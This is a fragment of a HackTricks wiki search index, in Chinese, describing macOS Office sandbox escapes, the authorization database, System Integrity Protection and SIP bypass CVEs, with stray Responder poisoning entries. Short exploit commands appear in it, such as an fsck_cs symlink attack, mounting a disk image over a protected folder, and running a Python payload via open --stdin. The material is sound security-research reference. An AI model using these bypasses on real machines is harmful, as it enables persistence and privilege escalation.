加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » References","id":"2621","title":"References"},"2622":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » macOS Office Sandbox Bypasses","id":"2622","title":"macOS Office Sandbox Bypasses"},"2623":{"body":"该应用程序使用 custom Sandbox 和权限 com.apple.security.temporary-exception.sbpl ,这个自定义沙箱允许在任何地方写入文件,只要文件名以 ~$ 开头:(require-any (require-all (vnode-type REGULAR-FILE) (regex #\\"(^|/)~$[^/]+$\\"))) 因此,逃逸的方式就是 编写一个 plist LaunchAgent 在 ~/Library/LaunchAgents/~$escape.plist 中。 查看 原始报告在这里 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox bypass via Launch Agents","id":"2623","title":"Word Sandbox bypass via Launch Agents"},"2624":{"body":"请记住,从第一次逃逸开始,Word 可以写入以 ~$ 开头的任意文件,尽管在之前漏洞的补丁后,无法在 /Library/Application Scripts 或 /Library/LaunchAgents 中写入。 发现从沙箱内可以创建一个 Login Item (用户登录时将执行的应用程序)。然而,这些应用程序 不会执行,除非 它们 经过公证 ,并且 无法添加参数 (因此不能仅使用 bash 运行反向 shell)。 在之前的沙箱绕过中,Microsoft 禁用了在 ~/Library/LaunchAgents 中写入文件的选项。然而,发现如果将 zip 文件作为 Login Item ,Archive Utility 将会 解压 到其当前位置。因此,由于默认情况下 ~/Library 中的 LaunchAgents 文件夹未创建,可以 将 plist 压缩到 LaunchAgents/~$escape.plist 并 放置 zip 文件到 ~/Library ,这样在解压时将到达持久性目标。 查看 原始报告在这里 
。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox bypass via Login Items and zip","id":"2624","title":"Word Sandbox bypass via Login Items and zip"},"2625":{"body":"(请记住,从第一次逃逸开始,Word 可以写入以 ~$ 开头的任意文件)。 然而,之前的技术有一个限制,如果 ~/Library/LaunchAgents 文件夹存在,因为其他软件创建了它,则会失败。因此发现了一个不同的 Login Items 链。 攻击者可以创建 .bash_profile 和 .zshenv 文件,包含要执行的有效载荷,然后将它们压缩并 写入受害者 的用户文件夹: ~/~$escape.zip 。 然后,将 zip 文件添加到 Login Items 中,然后是 Terminal 应用程序。当用户重新登录时,zip 文件将被解压到用户文件中,覆盖 .bash_profile 和 .zshenv ,因此,终端将执行其中一个文件(取决于使用的是 bash 还是 zsh)。 查看 原始报告在这里 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox bypass via Login Items and .zshenv","id":"2625","title":"Word Sandbox bypass via Login Items and .zshenv"},"2626":{"body":"从沙箱进程中,仍然可以使用 open 工具调用其他进程。此外,这些进程将在 它们自己的沙箱 中运行。 发现 open 工具有 --env 选项,可以使用 特定环境 变量运行应用程序。因此,可以在 沙箱内 的文件夹中创建 .zshenv 文件 ,并使用 open 和 --env 将 HOME 变量 设置为该文件夹,打开 Terminal 应用程序,这将执行 .zshenv 文件(出于某种原因,还需要设置变量 __OSINSTALL_ENVIROMENT)。 查看 原始报告在这里 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox Bypass with Open and env variables","id":"2626","title":"Word Sandbox Bypass with Open and env variables"},"2627":{"body":"open 工具还支持 --stdin 参数(在之前的绕过后,无法再使用 --env)。 问题是,即使 python 是由 Apple 签名的,它 不会执行 带有 quarantine 属性的脚本。然而,可以从 stdin 传递一个脚本,这样它就不会检查是否被隔离: 放置一个 ~$exploit.py 文件,包含任意 Python 命令。 运行 open –stdin=\'~$exploit.py\' -a Python ,这将使用我们放置的文件作为标准输入运行 Python 应用程序。Python 高兴地运行我们的代码,并且由于它是 launchd 的子进程,因此不受 Word 沙箱规则的限制。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 
支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox Debug & Bypass » macOS Office Sandbox Bypasses » Word Sandbox Bypass with Open and stdin","id":"2627","title":"Word Sandbox Bypass with Open and stdin"},"2628":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » macOS Authorizations DB & Authd","id":"2628","title":"macOS Authorizations DB & Authd"},"2629":{"body":"位于 /var/db/auth.db 的数据库用于存储执行敏感操作的权限。这些操作完全在 用户空间 中执行,通常由 XPC 服务 使用,这些服务需要检查 调用客户端是否被授权 执行某些操作,通过检查该数据库。 最初,该数据库是从 /System/Library/Security/authorization.plist 的内容创建的。然后,一些服务可能会添加或修改该数据库以添加其他权限。 规则存储在数据库中的 rules 表内,包含以下列: id : 每条规则的唯一标识符,自动递增,作为主键。 name : 规则的唯一名称,用于在授权系统中识别和引用它。 type : 指定规则的类型,仅限于值 1 或 2,以定义其授权逻辑。 class : 将规则分类为特定类别,确保它是正整数。 \\"allow\\" 表示允许,\\"deny\\" 表示拒绝,\\"user\\" 如果组属性指示一个允许访问的组,\\"rule\\" 表示在数组中需要满足的规则,\\"evaluate-mechanisms\\" 后跟一个 mechanisms 数组,这些机制可以是内置的或是 /System/Library/CoreServices/SecurityAgentPlugins/ 或 /Library/Security//SecurityAgentPlugins 中的一个包的名称。 group : 指示与规则相关联的用户组,用于基于组的授权。 kofn : 表示 \\"k-of-n\\" 参数,确定必须满足的子规则数量。 timeout : 定义规则授予的授权在多少秒后过期。 flags : 包含各种标志,以修改规则的行为和特征。 tries : 限制允许的授权尝试次数,以增强安全性。 version : 跟踪规则的版本,以便进行版本控制和更新。 created : 记录规则创建时的时间戳,以便审计。 modified : 存储对规则进行的最后修改的时间戳。 hash : 保存规则的哈希值,以确保其完整性并检测篡改。 identifier : 提供唯一的字符串标识符,例如 UUID,以供外部引用规则。 requirement : 包含序列化数据,定义规则的特定授权要求和机制。 comment : 
提供关于规则的可读描述或注释,以便于文档和清晰性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » 授权数据库","id":"2629","title":"授权数据库"},"263":{"body":"伪造 DHCP 响应可以永久中毒受害者的路由信息,提供比 ARP 中毒更隐蔽的替代方案。 这需要对目标网络配置的精确了解。 运行攻击:./Responder.py -I eth0 -Pdv 这种方法可以有效捕获 NTLMv1/2 哈希,但需要小心处理以避免网络中断。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 使用 Responder 进行 DHCP 中毒","id":"263","title":"使用 Responder 进行 DHCP 中毒"},"2630":{"body":"bash # List by name and comments\\nsudo sqlite3 /var/db/auth.db \\"select name, comment from rules\\" # Get rules for com.apple.tcc.util.admin\\nsecurity authorizationdb read com.apple.tcc.util.admin\\n\\n\\n\\n\\nclass\\nrule\\ncomment\\nFor modification of TCC settings.\\ncreated\\n701369782.01043606\\nmodified\\n701369782.01043606\\nrule\\n\\nauthenticate-admin-nonshared\\n\\nversion\\n0\\n\\n 此外,在 https://www.dssw.co.uk/reference/authorization-rights/authenticate-admin-nonshared/ 可以查看 authenticate-admin-nonshared 的含义: json {\\n\\"allow-root\\": \\"false\\",\\n\\"authenticate-user\\": \\"true\\",\\n\\"class\\": \\"user\\",\\n\\"comment\\": \\"Authenticate as an administrator.\\",\\n\\"group\\": \\"admin\\",\\n\\"session-owner\\": \\"false\\",\\n\\"shared\\": \\"false\\",\\n\\"timeout\\": \\"30\\",\\n\\"tries\\": \\"10000\\",\\n\\"version\\": \\"1\\"\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » 示例","id":"2630","title":"示例"},"2631":{"body":"它是一个守护进程,将接收请求以授权客户端执行敏感操作。它作为一个在 XPCServices/ 文件夹中定义的 XPC 服务工作,并将日志写入 /var/log/authd.log。 此外,使用安全工具可以测试许多 Security.framework API。例如,运行 AuthorizationExecuteWithPrivileges:security execute-with-privileges /bin/ls 这将以 root 身份分叉并执行 /usr/libexec/security_authtrampoline /bin/ls,这将提示请求权限以 root 身份执行 ls: tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: 
HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Authorizations DB & Authd » Authd","id":"2631","title":"Authd"},"2632":{"body":"Reading time: 19 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » macOS SIP","id":"2632","title":"macOS SIP"},"2633":{"body":"系统完整性保护 (SIP) 在 macOS 中是一种机制,旨在防止即使是最特权的用户也对关键系统文件夹进行未经授权的更改。此功能在通过限制在受保护区域内添加、修改或删除文件等操作来维护系统的完整性方面发挥着至关重要的作用。SIP 保护的主要文件夹包括: /System /bin /sbin /usr 管理 SIP 行为的规则定义在位于 /System/Library/Sandbox/rootless.conf 的配置文件中。在此文件中,以星号 (*) 开头的路径被视为对其他严格 SIP 限制的例外。 考虑以下示例: javascript /usr\\n* /usr/libexec/cups\\n* /usr/local\\n* /usr/share/man 这个片段暗示,虽然 SIP 通常保护 /usr 目录,但有特定的子目录(/usr/libexec/cups、/usr/local 和 /usr/share/man)可以进行修改,正如它们路径前面的星号(*)所示。 要验证某个目录或文件是否受到 SIP 保护,可以使用 ls -lOd 命令检查是否存在 restricted 或 sunlnk 标志。例如: bash ls -lOd /usr/libexec/cups\\ndrwxr-xr-x 11 root wheel sunlnk 352 May 13 00:29 /usr/libexec/cups 在这种情况下, sunlnk 标志表示 /usr/libexec/cups 目录本身 无法被删除 ,尽管可以创建、修改或删除其中的文件。 另一方面: bash ls -lOd /usr/libexec\\ndrwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec 这里, restricted 标志表示 /usr/libexec 目录受到 SIP 保护。在 SIP 保护的目录中,无法创建、修改或删除文件。 此外,如果一个文件包含 com.apple.rootless 扩展 属性 ,该文件也将受到 SIP 保护 。 tip 请注意, Sandbox 钩子 hook_vnode_check_setextattr 阻止任何尝试修改扩展属性 com.apple.rootless 的行为。 SIP 还限制其他根操作 ,例如: 加载不受信任的内核扩展 获取 Apple 签名进程的任务端口 修改 NVRAM 变量 允许内核调试 选项以位标志的形式保存在 nvram 变量中(在 Intel 上为 
csr-active-config,在 ARM 上从启动的设备树中读取 lp-sip0)。您可以在 csr.sh 中找到这些标志:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 基本信息","id":"2633","title":"基本信息"},"2634":{"body":"您可以使用以下命令检查系统是否启用了 SIP: bash csrutil status 如果您需要禁用 SIP,您必须在恢复模式下重启计算机(在启动时按 Command+R),然后执行以下命令: bash csrutil disable 如果您希望保持 SIP 启用但移除调试保护,可以使用: bash csrutil enable --without debug","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » SIP 状态","id":"2634","title":"SIP 状态"},"2635":{"body":"禁止加载未签名的内核扩展 (kexts),确保只有经过验证的扩展与系统内核交互。 防止调试 macOS 系统进程,保护核心系统组件免受未经授权的访问和修改。 抑制工具 如 dtrace 检查系统进程,进一步保护系统操作的完整性。 在此演讲中了解更多关于 SIP 的信息 .","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 其他限制","id":"2635","title":"其他限制"},"2636":{"body":"com.apple.rootless.xpc.bootstrap: 控制 launchd com.apple.rootless.install[.heritable]: 访问文件系统 com.apple.rootless.kext-management: kext_request com.apple.rootless.datavault.controller: 管理 UF_DATAVAULT com.apple.rootless.xpc.bootstrap: XPC 设置能力 com.apple.rootless.xpc.effective-root: 通过 launchd XPC 获取 root 权限 com.apple.rootless.restricted-block-devices: 访问原始块设备 com.apple.rootless.internal.installer-equivalent: 不受限制的文件系统访问 com.apple.rootless.restricted-nvram-variables[.heritable]: 完全访问 NVRAM com.apple.rootless.storage.label: 修改由 com.apple.rootless xattr 限制的文件,使用相应的标签 com.apple.rootless.volume.VM.label: 在卷上维护 VM 交换","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 与 SIP 相关的权限","id":"2636","title":"与 SIP 相关的权限"},"2637":{"body":"绕过 SIP 使攻击者能够: 访问用户数据 :读取所有用户帐户的敏感用户数据,如邮件、消息和 Safari 历史记录。 TCC 绕过 :直接操纵 TCC(透明性、同意和控制)数据库,以授予对网络摄像头、麦克风和其他资源的未经授权访问。 建立持久性 :在 SIP 保护的位置放置恶意软件,使其即使在 root 权限下也难以删除。这还包括篡改恶意软件删除工具(MRT)的潜在能力。 加载内核扩展 :尽管有额外的保护措施,绕过 SIP 简化了加载未签名内核扩展的过程。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » SIP 绕过","id":"2637","title":"SIP 绕过"},"2638":{"body":"使用 Apple 
证书签名的安装包 可以绕过其保护。这意味着即使是标准开发者签名的包,如果尝试修改 SIP 保护的目录,也会被阻止。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 安装包","id":"2638","title":"安装包"},"2639":{"body":"一个潜在的漏洞是,如果在 rootless.conf 中指定了一个文件但当前不存在 ,则可以创建该文件。恶意软件可以利用这一点在系统上 建立持久性 。例如,如果恶意程序在 rootless.conf 中列出但不存在,它可以在 /System/Library/LaunchDaemons 中创建一个 .plist 文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 不存在的 SIP 文件","id":"2639","title":"不存在的 SIP 文件"},"264":{"body":"Responder 将使用上述协议冒充服务,当用户尝试对伪造的服务进行身份验证时捕获凭据(通常是 NTLMv2 挑战/响应)。 可以尝试降级到 NetNTLMv1 或禁用 ESS 以便于凭据破解。 重要的是要注意,使用这些技术应合法和道德,确保获得适当授权,避免干扰或未经授权的访问。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 使用 Responder 捕获凭据","id":"264","title":"使用 Responder 捕获凭据"},"2640":{"body":"caution 权限 com.apple.rootless.install.heritable 允许绕过 SIP CVE-2019-8561 发现可以在 系统验证其代码 签名后 交换安装包 ,然后系统将安装恶意包而不是原始包。由于这些操作是由 system_installd 执行的,因此可以绕过 SIP。 CVE-2020–9854 如果从挂载的映像或外部驱动器安装包, 安装程序 将 执行 来自 该文件系统 的二进制文件(而不是来自 SIP 保护的位置),使 system_installd 执行任意二进制文件。 CVE-2021-30892 - Shrootless 来自此博客文章的研究人员 发现了 macOS 的系统完整性保护(SIP)机制中的一个漏洞,称为 \'Shrootless\' 漏洞。该漏洞围绕 system_installd 守护进程,该进程具有权限 com.apple.rootless.install.heritable ,允许其任何子进程绕过 SIP 的文件系统限制。 system_installd 守护进程将安装由 Apple 签名的包。 研究人员发现,在安装 Apple 签名的包(.pkg 文件)时, system_installd 运行 包中包含的任何 后安装 脚本。这些脚本由默认 shell zsh 执行,如果存在,它会自动 运行 来自 /etc/zshenv 文件的命令,即使在非交互模式下。攻击者可以利用这种行为:通过创建恶意的 /etc/zshenv 文件并等待 system_installd 调用 zsh ,他们可以在设备上执行任意操作。 此外,发现 /etc/zshenv 可以作为一种通用攻击技术 ,不仅仅用于 SIP 绕过。每个用户配置文件都有一个 ~/.zshenv 文件,其行为与 /etc/zshenv 相同,但不需要 root 权限。该文件可以用作持久性机制,每次 zsh 启动时触发,或作为提升权限的机制。如果管理员用户使用 sudo -s 或 sudo 提升到 root,~/.zshenv 文件将被触发,有效地提升到 root。 CVE-2022-22583 在 CVE-2022-22583 中发现, system_installd 进程仍然可以被滥用,因为它将 后安装脚本放在 SIP 保护的 /tmp 中的随机命名文件夹内 。问题在于 /tmp 本身并不受 SIP 保护 ,因此可以在其上 挂载 一个 虚拟映像 ,然后 安装程序 会将 后安装脚本 放入其中, 卸载 虚拟映像, 重新创建 所有 文件夹 并 添加 带有 有效负载 的 后安装 脚本以执行。 fsck_cs 工具 发现了一个漏洞,其中 fsck_cs 
被误导以破坏一个关键文件,因为它能够跟随 符号链接 。具体来说,攻击者从 /dev/diskX 创建了一个指向文件 /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist 的链接。在 /dev/diskX 上执行 fsck_cs 导致 Info.plist 的损坏。该文件的完整性对操作系统的 SIP(系统完整性保护)至关重要,SIP 控制内核扩展的加载。一旦损坏,SIP 管理内核排除的能力就会受到影响。 利用此漏洞的命令是: bash ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX\\nfsck_cs /dev/diskX 1>&-\\ntouch /Library/Extensions/\\nreboot 该漏洞的利用具有严重的影响。Info.plist 文件,通常负责管理内核扩展的权限,变得无效。这包括无法将某些扩展列入黑名单,例如 AppleHWAccess.kext。因此,随着 SIP 的控制机制失效,该扩展可以被加载,从而授予对系统 RAM 的未经授权的读写访问。 在 SIP 保护的文件夹上挂载 可以在 SIP 保护的文件夹上挂载新的文件系统以绕过保护 。 bash mkdir evil\\n# Add contento to the folder\\nhdiutil create -srcfolder evil evil.dmg\\nhdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg Upgrader bypass (2016) 系统设置为从 Install macOS Sierra.app 中的嵌入式安装程序磁盘映像启动以升级操作系统,利用 bless 工具。使用的命令如下: bash /usr/sbin/bless -setBoot -folder /Volumes/Macintosh HD/macOS Install Data -bootefi /Volumes/Macintosh HD/macOS Install Data/boot.efi -options config=\\"\\\\macOS Install Data\\\\com.apple.Boot\\" -label macOS Installer 该过程的安全性可能会受到威胁,如果攻击者在启动之前更改了升级映像(InstallESD.dmg)。该策略涉及用恶意版本(libBaseIA.dylib)替换动态加载器(dyld)。此替换导致在启动程序时执行攻击者的代码。 攻击者的代码在升级过程中获得控制权,利用系统对安装程序的信任。攻击通过通过方法调换(method swizzling)更改InstallESD.dmg映像,特别针对extractBootBits方法。这允许在使用磁盘映像之前注入恶意代码。 此外,在InstallESD.dmg中,有一个BaseSystem.dmg,它作为升级代码的根文件系统。将动态库注入其中允许恶意代码在能够更改操作系统级文件的进程中运行,显著增加了系统被攻陷的潜力。 systemmigrationd (2023) 在 DEF CON 31 的演讲中,展示了如何**systemmigrationd (可以绕过SIP)执行 bash 和 perl 脚本,这可以通过环境变量 BASH_ENV 和 PERL5OPT**被滥用。 CVE-2023-42860 正如 这篇博客文章中详细说明的 ,来自InstallAssistant.pkg包的postinstall脚本允许执行: bash /usr/bin/chflags -h norestricted \\"${SHARED_SUPPORT_PATH}/SharedSupport.dmg\\" 并且可以在 ${SHARED_SUPPORT_PATH}/SharedSupport.dmg 中创建一个符号链接,这将允许用户 解除任何文件的限制,绕过 SIP 保护 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 
com.apple.rootless.install.heritable","id":"2640","title":"com.apple.rootless.install.heritable"},"2641":{"body":"caution 权限 com.apple.rootless.install 允许绕过 SIP 权限 com.apple.rootless.install 被认为可以绕过 macOS 的系统完整性保护 (SIP)。这在与 CVE-2022-26712 相关时特别提到。 在这个特定情况下,位于 /System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc 的系统 XPC 服务拥有此权限。这使得相关进程能够绕过 SIP 限制。此外,该服务显著提供了一种允许在不执行任何安全措施的情况下移动文件的方法。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » com.apple.rootless.install","id":"2641","title":"com.apple.rootless.install"},"2642":{"body":"密封系统快照是 Apple 在 macOS Big Sur (macOS 11) 中引入的一项功能,作为其 系统完整性保护 (SIP) 机制的一部分,以提供额外的安全性和系统稳定性。它们本质上是系统卷的只读版本。 以下是更详细的介绍: 不可变系统 :密封系统快照使 macOS 系统卷变得“不可变”,这意味着它无法被修改。这防止了任何未经授权或意外的更改,从而可能危及安全性或系统稳定性。 系统软件更新 :当您安装 macOS 更新或升级时,macOS 会创建一个新的系统快照。macOS 启动卷随后使用 APFS (Apple 文件系统) 切换到这个新快照。应用更新的整个过程变得更安全、更可靠,因为系统始终可以在更新过程中出现问题时恢复到先前的快照。 数据分离 :结合在 macOS Catalina 中引入的数据和系统卷分离的概念,密封系统快照功能确保您的所有数据和设置存储在一个单独的“ 数据 ”卷上。这种分离使您的数据独立于系统,从而简化了系统更新的过程并增强了系统安全性。 请记住,这些快照由 macOS 自动管理,并且由于 APFS 的空间共享能力,不会占用您磁盘上的额外空间。还需要注意的是,这些快照与 时间机器快照 不同,后者是用户可访问的整个系统的备份。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 密封系统快照","id":"2642","title":"密封系统快照"},"2643":{"body":"命令 diskutil apfs list 列出 APFS 卷的详细信息 及其布局: +-- Container disk3 966B902E-EDBA-4775-B743-CF97A0556A13\\n| ====================================================\\n| APFS Container Reference: disk3\\n| Size (Capacity Ceiling): 494384795648 B (494.4 GB)\\n| Capacity In Use By Volumes: 219214536704 B (219.2 GB) (44.3% used)\\n| Capacity Not Allocated: 275170258944 B (275.2 GB) (55.7% free)\\n| |\\n| +-< Physical Store disk0s2 86D4B7EC-6FA5-4042-93A7-D3766A222EBE\\n| | -----------------------------------------------------------\\n| | APFS Physical Store Disk: disk0s2\\n| | Size: 494384795648 B (494.4 GB)\\n| |\\n| +-> Volume disk3s1 7A27E734-880F-4D91-A703-FB55861D49B7\\n| | 
---------------------------------------------------\\n| | APFS Volume Disk (Role): disk3s1 (System)\\n| | Name: Macintosh HD (Case-insensitive)\\n| | Mount Point: /System/Volumes/Update/mnt1\\n| | Capacity Consumed: 12819210240 B (12.8 GB)\\n| | Sealed: Broken\\n| | FileVault: Yes (Unlocked)\\n| | Encrypted: No\\n| | |\\n| | Snapshot: FAA23E0C-791C-43FF-B0E7-0E1C0810AC61\\n| | Snapshot Disk: disk3s1s1\\n| | Snapshot Mount Point: /\\n| | Snapshot Sealed: Yes\\n[...]\\n+-> Volume disk3s5 281959B7-07A1-4940-BDDF-6419360F3327\\n| ---------------------------------------------------\\n| APFS Volume Disk (Role): disk3s5 (Data)\\n| Name: Macintosh HD - Data (Case-insensitive) | Mount Point: /System/Volumes/Data | Capacity Consumed: 412071784448 B (412.1 GB) | Sealed: No\\n| FileVault: Yes (Unlocked) 在之前的输出中,可以看到 用户可访问的位置 被挂载在 /System/Volumes/Data 下。 此外, macOS 系统卷快照 被挂载在 / 并且是 密封的 (由操作系统进行加密签名)。因此,如果绕过 SIP 并进行修改, 操作系统将无法启动 。 还可以通过运行以下命令 验证密封是否启用 : bash csrutil authenticated-root status\\nAuthenticated Root status: enabled 此外,快照磁盘也被挂载为 只读 : bash mount\\n/dev/disk3s1s1 on / (apfs, sealed, local, read-only, journaled) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS SIP » 检查快照","id":"2643","title":"检查快照"},"2644":{"body":"Reading time: 23 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC","id":"2644","title":"macOS TCC"},"2645":{"body":"TCC (透明性、同意和控制) 是一个安全协议,专注于规范应用程序权限。其主要作用是保护敏感功能,如 位置服务、联系人、照片、麦克风、相机、辅助功能和完整磁盘访问 。通过在授予应用程序访问这些元素之前要求用户明确同意,TCC 增强了隐私和用户对其数据的控制。 当应用程序请求访问受保护的功能时,用户会遇到 TCC。这通过一个提示可见,允许用户 批准或拒绝访问 。此外,TCC 还支持用户的直接操作,例如 将文件拖放到应用程序中 ,以授予对特定文件的访问,确保应用程序仅访问明确允许的内容。 TCC 提示的示例 TCC 由位于 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd 的 守护进程 处理,并在 /System/Library/LaunchDaemons/com.apple.tccd.system.plist 中配置(注册 mach 服务 com.apple.tccd.system)。 每个登录用户都有一个 用户模式 tccd 在运行,定义在 /System/Library/LaunchAgents/com.apple.tccd.plist 中,注册 mach 服务 com.apple.tccd 和 com.apple.usernotifications.delegate.com.apple.tccd。 在这里你可以看到 tccd 作为系统和用户运行: bash ps -ef | grep tcc\\n0 374 1 0 Thu07PM ?? 2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system\\n501 63079 1 0 6:59PM ?? 0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd 权限是 从父应用程序继承 的, 权限 是 根据 Bundle ID 和 Developer ID 跟踪 的。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 基本信息","id":"2645","title":"基本信息"},"2646":{"body":"允许/拒绝的信息存储在一些 TCC 数据库中: 系统范围的数据库在 /Library/Application Support/com.apple.TCC/TCC.db 。 该数据库是 SIP 保护 的,因此只有 SIP 绕过才能写入。 用户 TCC 数据库 $HOME/Library/Application Support/com.apple.TCC/TCC.db 用于每个用户的偏好设置。 该数据库受到保护,因此只有具有高 TCC 权限的进程(如完全磁盘访问)才能写入(但它不受 SIP 保护)。 warning 之前的数据库也 受到 TCC 保护以进行读取访问 。因此,除非是来自 TCC 特权进程,否则您 无法读取 常规用户 TCC 数据库。 但是,请记住,具有这些高权限的进程(如 FDA 或 kTCCServiceEndpointSecurityClient )将能够写入用户的 TCC 数据库。 还有一个 第三个 TCC 数据库在 /var/db/locationd/clients.plist 中,指示允许 访问位置服务 的客户端。 SIP 保护的文件 /Users/carlospolop/Downloads/REG.db (也受到 TCC 的读取访问保护)包含所有 有效 TCC 数据库 的 位置 。 SIP 保护的文件 /Users/carlospolop/Downloads/MDMOverrides.plist (也受到 TCC 的读取访问保护)包含更多 TCC 授予的权限。 SIP 保护的文件 
